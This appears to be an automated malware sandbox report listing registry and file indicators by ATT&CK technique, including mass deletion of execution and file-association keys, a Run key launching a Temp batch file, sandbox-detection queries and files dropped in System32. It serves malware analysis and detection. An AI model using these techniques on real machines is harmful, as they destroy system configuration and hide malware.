Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PrintIsolationHost.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sdxhelper.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setlang.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieinstal.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscorsvw.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfeedssync.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosrec.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerpnt.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ExtExport.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ngentask.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenotem.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runtimebroker.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolsv.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenote.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\orgchart.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PrintDialog.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe	reg.exe

Modifies system executable filetype association 2 TTPs 46 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0198-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0113-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0174-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0185-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0230-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0000050B-0000-0010-8000-00AA006D2EA4}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0205-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0015-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0147-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0013-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0015-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0232-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0210-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0085-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0239-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0263-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209FF-0000-0000-C000-000000000046}\LocalServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0345-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0404-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0114-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0190-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0229-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0359-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0176-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0293-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0339-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0169-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0166-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0113-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0330-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0332-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0370-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E68d2B3E-192D-448E-827E-239082D74DC6}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BE39F3DA-1B13-11D0-887F-00A0C90F2744}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0173-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0261-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0193-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0095-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEEE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0163-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0151-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0220-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45EAE363-122A-445A-97B6-3DE890E786F8}\LocalServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0043-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0121-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0214-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0270-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0379-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0148-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0244-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0129-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}\InprocServer32	reg.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat"	reg.exe

Installs/modifies Browser Helper Object 2 TTPs 7 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	reg.exe

Maps connected drives based on registry 3 TTPs 3 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe

Drops file in System32 directory 3 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\ovp_du.exe	cmd.exe
File created	C:\Windows\System32\LogonUI.exe	cmd.exe
File created	C:\Windows\SysWOW64\*	cmd.exe

Drops file in Windows directory 3 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File created	C:\Windows\Boot\EFI\*	cmd.exe
File created	C:\Windows\Windows\System32\LogonUI.exe	cmd.exe
File opened for modification	C:\Windows\Globalization\ICU\icudtl.dat	cmd.exe

Checks SCSI registry key(s) 3 TTPs 59 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport	reg.exe
